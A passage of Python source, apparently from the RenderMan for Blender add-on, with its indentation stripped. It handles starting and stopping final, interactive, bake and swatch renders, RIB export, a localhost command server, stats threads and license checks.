crop.append(float(c))
if len(crop) == 4:
__RMAN_RENDER__.rman_scene_sync.update_cropwindow(crop)
def stopRender(self):
global __RMAN_RENDER__
rfb_log().debug("Stop Render Requested.")
if __RMAN_RENDER__.rman_interactive_running:
__turn_off_viewport__()
__RMAN_RENDER__.del_bl_engine()
def selectObjectById(self):
global __RMAN_RENDER__
obj_id = int(self.msg.getOpt('id', '0'))
if obj_id < 0 or not (obj_id in __RMAN_RENDER__.rman_scene.obj_hash):
return
name = __RMAN_RENDER__.rman_scene.obj_hash[obj_id]
rfb_log().debug('ID: %d Obj Name: %s' % (obj_id, name))
obj = bpy.context.scene.objects[name]
if obj:
if bpy.context.view_layer.objects.active:
bpy.context.view_layer.objects.active.select_set(False)
obj.select_set(True)
bpy.context.view_layer.objects.active = obj
def selectSurfaceById(self):
self.selectObjectById()
window = bpy.context.window_manager.windows[0]
if window.screen:
for a in window.screen.areas:
if a.type == "PROPERTIES":
for s in a.spaces:
if s.type == "PROPERTIES":
try:
s.context = "MATERIAL"
except:
pass
return
def start_cmd_server():
global __RMAN_IT_PORT__
if __RMAN_IT_PORT__ != -1:
return __RMAN_IT_PORT__
# zero port makes the OS pick one
host, port = "localhost", 0
# install handler
chatserver.protocols['it'] = ItHandler
# Create the server, binding to localhost on some port
server = socketserver.TCPServer((host, port),
chatserver.CommandHandler)
ip, port = server.server_address
thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
thread.daemon = True
thread.start()
__RMAN_IT_PORT__ = port
return __RMAN_IT_PORT__
def draw_threading_func(db):
refresh_rate = get_pref('rman_viewport_refresh_rate', default=0.01)
while db.rman_is_live_rendering:
if not scene_utils.any_areas_shading():
# if there are no 3d viewports, stop IPR
db.del_bl_engine()
break
if db.rman_is_xpu:
if db.has_buffer_updated():
try:
db.bl_engine.tag_redraw()
db.reset_buffer_updated()
except ReferenceError as e:
# calling tag_redraw has failed. This might mean
# that there are no more view_3d areas that are shading. Try to
# stop IPR.
#rfb_log().debug("Error calling tag_redraw (%s). Aborting..." % str(e))
db.del_bl_engine()
return
time.sleep(refresh_rate)
else:
time.sleep(1.0)
def call_stats_export_payloads(db):
while db.rman_is_exporting:
db.stats_mgr.update_payloads()
time.sleep(0.1)
def call_stats_update_payloads(db):
while db.rman_running:
if not db.bl_engine:
break
if db.rman_is_xpu and db.is_regular_rendering():
# stop the render if we are rendering in XPU mode
# and we've reached ~100%
if float(db.stats_mgr._progress) > 98.0:
db.rman_is_live_rendering = False
break
db.stats_mgr.update_payloads()
time.sleep(0.1)
def progress_cb(e, d, db):
if not db.stats_mgr.is_connected():
# set the progress in stats_mgr
# we can at least get progress from the event callback
# in case the stats listener is not connected
db.stats_mgr._progress = int(d)
if db.rman_is_live_rendering and int(d) == 100:
db.rman_is_live_rendering = False
def bake_progress_cb(e, d, db):
if not db.stats_mgr.is_connected():
db.stats_mgr._progress = int(d)
def batch_progress_cb(e, d, db):
# just tell the stats mgr to draw
db.stats_mgr._progress = int(d)
db.stats_mgr.draw_render_stats()
print("R90000 %4d%%" % int(d), file = sys.stderr )
sys.stderr.flush()
def render_cb(e, d, db):
if d == 0:
rfb_log().debug("RenderMan has exited.")
if db.rman_is_live_rendering:
db.rman_is_live_rendering = False
def live_render_cb(e, d, db):
if d == 0:
db.rman_is_refining = False
else:
db.rman_is_refining = True
def preload_xpu():
"""On linux there is a problem with std::call_once and
blender, by default, being linked with a static libstdc++.
The loader seems to not be able to get the right tls key
for the __once_call global when libprman loads libxpu. By preloading
we end up calling the proxy in the blender executable and
that works.
Returns:
ctypes.CDLL of xpu or None if that fails. None if not on linux
"""
if sys.platform != 'linux':
return None
tree = envconfig().rmantree
xpu_path = os.path.join(tree, 'lib', 'libxpu.so')
try:
xpu = ctypes.CDLL(xpu_path)
return xpu
except OSError as error:
rfb_log().debug('Failed to preload xpu: {0}'.format(error))
return None
class RmanRender(object):
'''
RmanRender class. This class is responsible for starting and stopping
the renderer. There should only be one instance of this class per session.
Do not create an instance of this class directly. Use RmanRender.get_rman_render()
'''
def __init__(self):
global __RMAN_RENDER__
self.rictl = rman.RiCtl.Get()
self.sgmngr = rman.SGManager.Get()
self.rman = rman
self.sg_scene = None
self.rman_scene = RmanScene(rman_render=self)
self.rman_scene_sync = RmanSceneSync(rman_render=self, rman_scene=self.rman_scene)
self.bl_engine = None
self.rman_running = False
self.rman_is_exporting = False
self.rman_interactive_running = False
self.rman_swatch_render_running = False
self.rman_is_live_rendering = False
self.rman_is_viewport_rendering = False
self.rman_is_xpu = False
self.rman_is_refining = False
self.rman_render_into = 'blender'
self.rman_license_failed = False
self.rman_license_failed_message = ''
self.it_port = -1
self.rman_callbacks = dict()
self.viewport_res_x = -1
self.viewport_res_y = -1
self.viewport_buckets = list()
self._draw_viewport_buckets = False
self.stats_mgr = RfBStatsManager(self)
self.deleting_bl_engine = threading.Lock()
self.stop_render_mtx = threading.Lock()
self._start_prman_begin()
# hold onto this or python will unload it
self.preload_xpu = preload_xpu()
@classmethod
def get_rman_render(self):
global __RMAN_RENDER__
if __RMAN_RENDER__ is None:
__RMAN_RENDER__ = RmanRender()
return __RMAN_RENDER__
@property
def bl_engine(self):
return self.__bl_engine
@bl_engine.setter
def bl_engine(self, bl_engine):
self.__bl_engine = bl_engine
def _start_prman_begin(self):
argv = []
argv.append("prman")
#argv.append("-Progress")
argv.append("-dspyserver")
argv.append("%s" % envconfig().rman_it_path)
argv.append("-statssession")
argv.append(self.stats_mgr.rman_stats_session_name)
woffs = ',' . join(rfb_config['woffs'])
if woffs:
argv.append('-woff')
argv.append(woffs)
self.rictl.PRManBegin(argv)
def __del__(self):
self.rictl.PRManEnd()
def del_bl_engine(self):
if not self.bl_engine:
return
if not self.deleting_bl_engine.acquire(timeout=2.0):
return
self.bl_engine = None
self.deleting_bl_engine.release()
def _append_render_cmd(self, render_cmd):
return render_cmd
def _dump_rib_(self, frame=1):
if envconfig().getenv('RFB_DUMP_RIB'):
rfb_log().debug("Writing to RIB...")
rib_time_start = time.time()
if sys.platform == ("win32"):
self.sg_scene.Render("rib C:/tmp/blender.%04d.rib -format ascii -indent" % frame)
else:
self.sg_scene.Render("rib /var/tmp/blender.%04d.rib -format ascii -indent" % frame)
rfb_log().debug("Finished writing RIB. Time: %s" % string_utils._format_time_(time.time() - rib_time_start))
def _load_placeholder_image(self):
placeholder_image = os.path.join(envconfig().rmantree, 'lib', 'textures', 'placeholder.png')
render = self.bl_scene.render
image_scale = 100.0 / render.resolution_percentage
result = self.bl_engine.begin_result(0, 0,
render.resolution_x * image_scale,
render.resolution_y * image_scale)
lay = result.layers[0]
try:
lay.load_from_file(placeholder_image)
except:
pass
self.bl_engine.end_result(result)
def _call_brickmake_for_selected(self):
rm = self.bl_scene.renderman
ob = bpy.context.active_object
if rm.external_animation:
for frame in range(self.bl_scene.frame_start, self.bl_scene.frame_end + 1):
expanded_str = string_utils.expand_string(ob.renderman.bake_filename_attr, frame=self.bl_scene.frame_current)
ptc_file = '%s.ptc' % expanded_str
bkm_file = '%s.bkm' % expanded_str
args = []
args.append('%s/bin/brickmake' % envconfig().rmantree)
args.append('-progress')
args.append('2')
args.append(ptc_file)
args.append(bkm_file)
subprocess.run(args)
else:
expanded_str = string_utils.expand_string(ob.renderman.bake_filename_attr, frame=self.bl_scene.frame_current)
ptc_file = '%s.ptc' % expanded_str
bkm_file = '%s.bkm' % expanded_str
args = []
args.append('%s/bin/brickmake' % envconfig().rmantree)
args.append('-progress')
args.append('2')
args.append(ptc_file)
args.append(bkm_file)
subprocess.run(args)
def _check_prman_license(self):
if not envconfig().is_valid_license:
self.rman_license_failed = True
self.rman_license_failed_message = 'Cannot find a valid RenderMan license. Aborting.'
elif not envconfig().has_rps_license:
self.rman_license_failed = True
self.rman_license_failed_message = 'Cannot find RPS-%s license feature. Aborting.' % (envconfig().feature_version)
else:
# check for any available PhotoRealistic-RenderMan licenses
status = envconfig().get_prman_license_status()
if not(status.found and status.is_available):
self.rman_license_failed = True
self.rman_license_failed_message = 'No PhotoRealistic-RenderMan licenses available. Aborting.'
elif status.is_expired():
self.rman_license_failed = True
self.rman_license_failed_message = 'PhotoRealistic-RenderMan licenses have expired (%s).' % str(status.exp_date)
if self.rman_license_failed:
if not self.rman_interactive_running:
self.bl_engine.report({'ERROR'}, self.rman_license_failed_message)
self.stop_render()
return False
return True
def is_regular_rendering(self):
# return if we are doing a regular render and not interactive
return (self.rman_running and not self.rman_interactive_running)
def do_draw_buckets(self):
return get_pref('rman_viewport_draw_bucket', default=True) and self.rman_is_refining
def do_draw_progressbar(self):
return get_pref('rman_viewport_draw_progress') and self.stats_mgr.is_connected() and self.stats_mgr._progress < 100
def start_export_stats_thread(self):
# start an export stats thread
global __RMAN_STATS_THREAD__
__RMAN_STATS_THREAD__ = threading.Thread(target=call_stats_export_payloads, args=(self, ))
__RMAN_STATS_THREAD__.start()
def start_stats_thread(self):
# start a stats thread so we can periodically call update_payloads
global __RMAN_STATS_THREAD__
if __RMAN_STATS_THREAD__:
__RMAN_STATS_THREAD__.join()
__RMAN_STATS_THREAD__ = None
__RMAN_STATS_THREAD__ = threading.Thread(target=call_stats_update_payloads, args=(self, ))
__RMAN_STATS_THREAD__.start()
def reset(self):
self.rman_license_failed = False
self.rman_license_failed_message = ''
self.rman_is_xpu = False
self.rman_is_refining = False
def start_render(self, depsgraph, for_background=False):
self.reset()
self.bl_scene = depsgraph.scene_eval
rm = self.bl_scene.renderman
self.it_port = start_cmd_server()
rfb_log().info("Parsing scene...")
time_start = time.time()
if not self._check_prman_license():
return False
if for_background:
self.rman_render_into = ''
is_external = True
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
if envconfig().getenv('RFB_BATCH_NO_PROGRESS') is None:
ec.RegisterCallback("Progress", batch_progress_cb, self)
self.rman_callbacks["Progress"] = batch_progress_cb
rman.Dspy.DisableDspyServer()
else:
self.rman_render_into = rm.render_into
is_external = False
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Progress", progress_cb, self)
self.rman_callbacks["Progress"] = progress_cb
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
try:
if self.rman_render_into == 'it':
rman.Dspy.EnableDspyServer()
else:
rman.Dspy.DisableDspyServer()
except:
pass
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
rendervariant = scene_utils.get_render_variant(self.bl_scene)
scene_utils.set_render_variant_config(self.bl_scene, config, render_config)
self.rman_is_xpu = (rendervariant == 'xpu')
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
was_connected = self.stats_mgr.is_connected()
if self.rman_is_xpu and self.rman_render_into == 'blender':
if not was_connected:
# force the stats to start in the case of XPU
# this is so that we can get a progress percentage
# if we can't get it to start, abort
self.stats_mgr.attach()
time.sleep(0.5) # give it a second to attach
if not self.stats_mgr.is_connected():
self.bl_engine.report({'ERROR'}, 'Cannot start live stats. Aborting XPU render')
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
try:
bl_layer = depsgraph.view_layer
self.rman_is_exporting = True
self.rman_running = True
self.start_export_stats_thread()
self.rman_scene.export_for_final_render(depsgraph, self.sg_scene, bl_layer, is_external=is_external)
self.rman_is_exporting = False
self.stats_mgr.reset_progress()
self._dump_rib_(self.bl_scene.frame_current)
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
self.rman_is_live_rendering = True
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
render_cmd = "prman"
if self.rman_render_into == 'blender':
render_cmd = "prman -live"
render_cmd = self._append_render_cmd(render_cmd)
self.sg_scene.Render(render_cmd)
if self.rman_render_into == 'blender':
dspy_dict = display_utils.get_dspy_dict(self.rman_scene)
render = self.rman_scene.bl_scene.render
render_view = self.bl_engine.active_view_get()
image_scale = render.resolution_percentage / 100.0
width = int(render.resolution_x * image_scale)
height = int(render.resolution_y * image_scale)
bl_image_rps= dict()
# register any AOV's as passes
for i, dspy_nm in enumerate(dspy_dict['displays'].keys()):
if i == 0:
continue
num_channels = -1
while num_channels == -1:
num_channels = self.get_numchannels(i)
dspy = dspy_dict['displays'][dspy_nm]
dspy_chan = dspy['params']['displayChannels'][0]
chan_info = dspy_dict['channels'][dspy_chan]
chan_type = chan_info['channelType']['value']
if num_channels == 4:
self.bl_engine.add_pass(dspy_nm, 4, 'RGBA')
elif num_channels == 3:
if chan_type == 'color':
self.bl_engine.add_pass(dspy_nm, 3, 'RGB')
else:
self.bl_engine.add_pass(dspy_nm, 3, 'XYZ')
elif num_channels == 2:
self.bl_engine.add_pass(dspy_nm, 2, 'XY')
else:
self.bl_engine.add_pass(dspy_nm, 1, 'X')
size_x = width
size_y = height
if render.use_border:
size_x = int(width * (render.border_max_x - render.border_min_x))
size_y = int(height * (render.border_max_y - render.border_min_y))
result = self.bl_engine.begin_result(0, 0,
size_x,
size_y,
view=render_view)
for i, dspy_nm in enumerate(dspy_dict['displays'].keys()):
if i == 0:
render_pass = result.layers[0].passes.find_by_name("Combined", render_view)
else:
render_pass = result.layers[0].passes.find_by_name(dspy_nm, render_view)
bl_image_rps[i] = render_pass
if self.rman_is_xpu:
# FIXME: for now, add a 1 second delay before starting the stats thread
# for some reason, XPU doesn't seem to reset the progress between renders
time.sleep(1.0)
self.start_stats_thread()
while self.bl_engine and not self.bl_engine.test_break() and self.rman_is_live_rendering:
time.sleep(0.01)
for i, rp in bl_image_rps.items():
buffer = self._get_buffer(width, height, image_num=i,
num_channels=rp.channels,
as_flat=False,
back_fill=False,
render=render)
if buffer:
rp.rect = buffer
if self.bl_engine:
self.bl_engine.update_result(result)
if result:
if self.bl_engine:
self.bl_engine.end_result(result)
# Try to save out the displays out to disk. This matches
# Cycles behavior
for i, dspy_nm in enumerate(dspy_dict['displays'].keys()):
filepath = dspy_dict['displays'][dspy_nm]['filePath']
buffer = self._get_buffer(width, height, image_num=i, as_flat=True)
if buffer:
bl_image = bpy.data.images.new(dspy_nm, width, height)
try:
bl_image.use_generated_float = True
bl_image.filepath_raw = filepath
bl_image.pixels = buffer
bl_image.file_format = 'OPEN_EXR'
bl_image.update()
bl_image.save()
except:
pass
finally:
bpy.data.images.remove(bl_image)
if not was_connected and self.stats_mgr.is_connected():
# if stats were not started before rendering, disconnect
self.stats_mgr.disconnect()
else:
self.start_stats_thread()
while self.bl_engine and not self.bl_engine.test_break() and self.rman_is_live_rendering:
time.sleep(0.01)
self.del_bl_engine()
self.stop_render()
return True
def start_external_render(self, depsgraph):
bl_scene = depsgraph.scene_eval
rm = bl_scene.renderman
self.rman_running = True
self.rman_render_into = ''
rib_options = ""
if rm.rib_compression == "gzip":
rib_options += " -compression gzip"
rib_format = 'ascii'
if rm.rib_format == 'binary':
rib_format = 'binary'
rib_options += " -format %s" % rib_format
if rib_format == "ascii":
rib_options += " -indent"
if rm.external_animation:
original_frame = bl_scene.frame_current
rfb_log().debug("Writing to RIB...")
for frame in range(bl_scene.frame_start, bl_scene.frame_end + 1):
bl_view_layer = depsgraph.view_layer
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.bl_engine.frame_set(frame, subframe=0.0)
self.rman_is_exporting = True
self.rman_scene.export_for_final_render(depsgraph, self.sg_scene, bl_view_layer, is_external=True)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rm.path_rib_output,
frame=frame,
asFilePath=True)
self.sg_scene.Render("rib %s %s" % (rib_output, rib_options))
self.sgmngr.DeleteScene(self.sg_scene)
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.bl_engine.frame_set(original_frame, subframe=0.0)
else:
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
time_start = time.time()
bl_view_layer = depsgraph.view_layer
rfb_log().info("Parsing scene...")
self.rman_is_exporting = True
self.rman_scene.export_for_final_render(depsgraph, self.sg_scene, bl_view_layer, is_external=True)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rm.path_rib_output,
frame=bl_scene.frame_current,
asFilePath=True)
rfb_log().debug("Writing to RIB: %s..." % rib_output)
rib_time_start = time.time()
self.sg_scene.Render("rib %s %s" % (rib_output, rib_options))
rfb_log().debug("Finished writing RIB. Time: %s" % string_utils._format_time_(time.time() - rib_time_start))
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
self.sgmngr.DeleteScene(self.sg_scene)
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
if rm.queuing_system != 'none':
spooler = rman_spool.RmanSpool(self, self.rman_scene, depsgraph)
spooler.batch_render()
self.rman_running = False
self.sg_scene = None
self.del_bl_engine()
return True
def start_bake_render(self, depsgraph, for_background=False):
self.reset()
self.bl_scene = depsgraph.scene_eval
rm = self.bl_scene.renderman
self.it_port = start_cmd_server()
rfb_log().info("Parsing scene...")
time_start = time.time()
if not self._check_prman_license():
return False
if for_background:
is_external = True
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
rman.Dspy.DisableDspyServer()
else:
is_external = False
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Progress", bake_progress_cb, self)
self.rman_callbacks["Progress"] = bake_progress_cb
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
self.rman_render_into = ''
rman.Dspy.DisableDspyServer()
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
bl_layer = depsgraph.view_layer
self.rman_is_exporting = True
self.rman_running = True
self.start_export_stats_thread()
self.rman_scene.export_for_bake_render(depsgraph, self.sg_scene, bl_layer, is_external=is_external)
self.rman_is_exporting = False
self._dump_rib_(self.bl_scene.frame_current)
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
render_cmd = "prman -blocking"
render_cmd = self._append_render_cmd(render_cmd)
self.sg_scene.Render(render_cmd)
self.start_stats_thread()
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.stop_render()
if rm.hider_type == 'BAKE_BRICKMAP_SELECTED':
self._call_brickmake_for_selected()
self.del_bl_engine()
return True
def start_external_bake_render(self, depsgraph):
bl_scene = depsgraph.scene_eval
rm = bl_scene.renderman
self.rman_running = True
self.rman_render_into = ''
rib_options = ""
if rm.rib_compression == "gzip":
rib_options += " -compression gzip"
rib_format = 'ascii'
if rm.rib_format == 'binary':
rib_format = 'binary'
rib_options += " -format %s" % rib_format
if rib_format == "ascii":
rib_options += " -indent"
if rm.external_animation:
original_frame = bl_scene.frame_current
rfb_log().debug("Writing to RIB...")
for frame in range(bl_scene.frame_start, bl_scene.frame_end + 1):
bl_view_layer = depsgraph.view_layer
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.bl_engine.frame_set(frame, subframe=0.0)
self.rman_is_exporting = True
self.rman_scene.export_for_bake_render(depsgraph, self.sg_scene, bl_view_layer, is_external=True)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rm.path_rib_output,
frame=frame,
asFilePath=True)
self.sg_scene.Render("rib %s %s" % (rib_output, rib_options))
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.sgmngr.DeleteScene(self.sg_scene)
self.bl_engine.frame_set(original_frame, subframe=0.0)
else:
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
time_start = time.time()
bl_view_layer = depsgraph.view_layer
rfb_log().info("Parsing scene...")
self.rman_is_exporting = True
self.rman_scene.export_for_bake_render(depsgraph, self.sg_scene, bl_view_layer, is_external=True)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rm.path_rib_output,
frame=bl_scene.frame_current,
asFilePath=True)
rfb_log().debug("Writing to RIB: %s..." % rib_output)
rib_time_start = time.time()
self.sg_scene.Render("rib %s %s" % (rib_output, rib_options))
rfb_log().debug("Finished writing RIB. Time: %s" % string_utils._format_time_(time.time() - rib_time_start))
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.sgmngr.DeleteScene(self.sg_scene)
if rm.queuing_system != 'none':
spooler = rman_spool.RmanSpool(self, self.rman_scene, depsgraph)
spooler.batch_render()
self.rman_running = False
self.sg_scene = None
self.del_bl_engine()
return True
def start_interactive_render(self, context, depsgraph):
global __DRAW_THREAD__
self.reset()
self.rman_interactive_running = True
self.rman_running = True
__update_areas__()
self.bl_scene = depsgraph.scene_eval
rm = depsgraph.scene_eval.renderman
self.it_port = start_cmd_server()
render_into_org = ''
self.rman_render_into = rm.render_ipr_into
self.rman_callbacks.clear()
# register the blender display driver
try:
if self.rman_render_into == 'blender':
# turn off dspyserver mode if we're not rendering to "it"
self.rman_is_viewport_rendering = True
rman.Dspy.DisableDspyServer()
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
ec.RegisterCallback("Render", live_render_cb, self)
self.rman_callbacks["Render"] = live_render_cb
self.viewport_buckets.clear()
self._draw_viewport_buckets = True
else:
rman.Dspy.EnableDspyServer()
except:
# force rendering to 'it'
rfb_log().error('Could not register Blender display driver. Rendering to "it".')
render_into_org = rm.render_ipr_into
rm.render_ipr_into = 'it'
self.rman_render_into = 'it'
rman.Dspy.EnableDspyServer()
if not self._check_prman_license():
return False
time_start = time.time()
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
rendervariant = scene_utils.get_render_variant(self.bl_scene)
scene_utils.set_render_variant_config(self.bl_scene, config, render_config)
self.rman_is_xpu = (rendervariant == 'xpu')
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.rman_scene_sync.sg_scene = self.sg_scene
rfb_log().info("Parsing scene...")
self.rman_is_exporting = True
self.start_export_stats_thread()
self.rman_scene.export_for_interactive_render(context, depsgraph, self.sg_scene)
self.rman_is_exporting = False
self._dump_rib_(self.bl_scene.frame_current)
rfb_log().info("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
self.rman_is_live_rendering = True
render_cmd = "prman -live"
render_cmd = self._append_render_cmd(render_cmd)
self.sg_scene.Render(render_cmd)
self.start_stats_thread()
rfb_log().info("RenderMan Viewport Render Started.")
if render_into_org != '':
rm.render_ipr_into = render_into_org
if not self.rman_is_xpu:
# for now, we only set the redraw callback for RIS
self.set_redraw_func()
# start a thread to periodically call engine.tag_redraw()
__DRAW_THREAD__ = threading.Thread(target=draw_threading_func, args=(self, ))
__DRAW_THREAD__.start()
return True
except Exception as e:
bpy.ops.renderman.printer('INVOKE_DEFAULT', level="ERROR", message='Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
def start_swatch_render(self, depsgraph):
self.reset()
self.bl_scene = depsgraph.scene_eval
rfb_log().debug("Parsing scene...")
time_start = time.time()
self.rman_callbacks.clear()
ec = rman.EventCallbacks.Get()
rman.Dspy.DisableDspyServer()
ec.RegisterCallback("Progress", progress_cb, self)
self.rman_callbacks["Progress"] = progress_cb
ec.RegisterCallback("Render", render_cb, self)
self.rman_callbacks["Render"] = render_cb
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
self.rman_is_exporting = True
self.rman_scene.export_for_swatch_render(depsgraph, self.sg_scene)
self.rman_is_exporting = False
self.rman_running = True
self.rman_swatch_render_running = True
self._dump_rib_()
rfb_log().debug("Finished parsing scene. Total time: %s" % string_utils._format_time_(time.time() - time_start))
if not self._check_prman_license():
return False
self.rman_is_live_rendering = True
self.sg_scene.Render("prman")
render = self.rman_scene.bl_scene.render
render_view = self.bl_engine.active_view_get()
image_scale = render.resolution_percentage / 100.0
width = int(render.resolution_x * image_scale)
height = int(render.resolution_y * image_scale)
result = self.bl_engine.begin_result(0, 0,
width,
height,
view=render_view)
layer = result.layers[0].passes.find_by_name("Combined", render_view)
while not self.bl_engine.test_break() and self.rman_is_live_rendering:
time.sleep(0.001)
if layer:
buffer = self._get_buffer(width, height, image_num=0, as_flat=False)
if buffer:
layer.rect = buffer
self.bl_engine.update_result(result)
# try to get the buffer one last time before exiting
if layer:
buffer = self._get_buffer(width, height, image_num=0, as_flat=False)
if buffer:
layer.rect = buffer
self.bl_engine.update_result(result)
self.stop_render()
self.bl_engine.end_result(result)
self.del_bl_engine()
return True
def start_export_rib_selected(self, context, rib_path, export_materials=True, export_all_frames=False):
self.rman_running = True
bl_scene = context.scene
if export_all_frames:
original_frame = bl_scene.frame_current
rfb_log().debug("Writing to RIB...")
for frame in range(bl_scene.frame_start, bl_scene.frame_end + 1):
bl_scene.frame_set(frame, subframe=0.0)
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.rman_is_exporting = True
self.rman_scene.export_for_rib_selection(context, self.sg_scene)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rib_path,
frame=frame,
asFilePath=True)
self.sg_scene.Render("rib " + rib_output + " -archive")
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.sgmngr.DeleteScene(self.sg_scene)
bl_scene.frame_set(original_frame, subframe=0.0)
else:
config = rman.Types.RtParamList()
render_config = rman.Types.RtParamList()
self.sg_scene = self.sgmngr.CreateScene(config, render_config, self.stats_mgr.rman_stats_session)
try:
self.rman_is_exporting = True
self.rman_scene.export_for_rib_selection(context, self.sg_scene)
self.rman_is_exporting = False
rib_output = string_utils.expand_string(rib_path,
frame=bl_scene.frame_current,
asFilePath=True)
self.sg_scene.Render("rib " + rib_output + " -archive")
except Exception as e:
self.bl_engine.report({'ERROR'}, 'Export failed: %s' % str(e))
rfb_log().error('Export Failed:\n%s' % traceback.format_exc())
self.stop_render(stop_draw_thread=False)
self.del_bl_engine()
return False
self.sgmngr.DeleteScene(self.sg_scene)
self.sg_scene = None
self.rman_running = False
return True
def stop_render(self, stop_draw_thread=True):
global __DRAW_THREAD__
global __RMAN_STATS_THREAD__
is_main_thread = (threading.current_thread() == threading.main_thread())
if is_main_thread:
rfb_log().debug("Trying to acquire stop_render_mtx")
if not self.stop_render_mtx.acquire(timeout=5.0):
return
if not self.rman_interactive_running and not self.rman_running:
return
self.rman_running = False
self.rman_interactive_running = False
self.rman_swatch_render_running = False
self.rman_is_viewport_rendering = False
self.rman_is_exporting = False
# Remove callbacks
ec = rman.EventCallbacks.Get()
if is_main_thread:
rfb_log().debug("Unregister any callbacks")
for k,v in self.rman_callbacks.items():
ec.UnregisterCallback(k, v, self)
self.rman_callbacks.clear()
self.rman_is_live_rendering = False
# wait for the drawing thread to finish
# if we are told to.
if stop_draw_thread and __DRAW_THREAD__:
__DRAW_THREAD__.join()
__DRAW_THREAD__ = None
# stop retrieving stats
if __RMAN_STATS_THREAD__:
__RMAN_STATS_THREAD__.join()
__RMAN_STATS_THREAD__ = None
if is_main_thread:
rfb_log().debug("Telling SceneGraph to stop.")
if self.sg_scene:
self.sg_scene.Stop()
if is_main_thread:
rfb_log().debug("Delete Scenegraph scene")
self.sgmngr.DeleteScene(self.sg_scene)
self.sg_scene = None
#self.stats_mgr.reset()
self.rman_scene.reset()
self.viewport_buckets.clear()
self._draw_viewport_buckets = False
__update_areas__()
self.stop_render_mtx.release()
if is_main_thread:
rfb_log().debug("RenderMan has Stopped.")
def get_blender_dspy_plugin(self):
global __BLENDER_DSPY_PLUGIN__
if __BLENDER_DSPY_PLUGIN__ == None:
# grab a pointer to the Blender display driver
ext = '.so'
if sys.platform == ("win32"):
ext = '.dll'
__BLENDER_DSPY_PLUGIN__ = ctypes.CDLL(os.path.join(envconfig().rmantree, 'lib', 'plugins', 'd_blender%s' % ext))
return __BLENDER_DSPY_PLUGIN__
def set_redraw_func(self):
# pass our callback function to the display driver
dspy_plugin = self.get_blender_dspy_plugin()
dspy_plugin.SetRedrawCallback(__CALLBACK_FUNC__)
def has_buffer_updated(self):
dspy_plugin = self.get_blender_dspy_plugin()
return dspy_plugin.HasBufferUpdated()
def reset_buffer_updated(self):
dspy_plugin = self.get_blender_dspy_plugin()
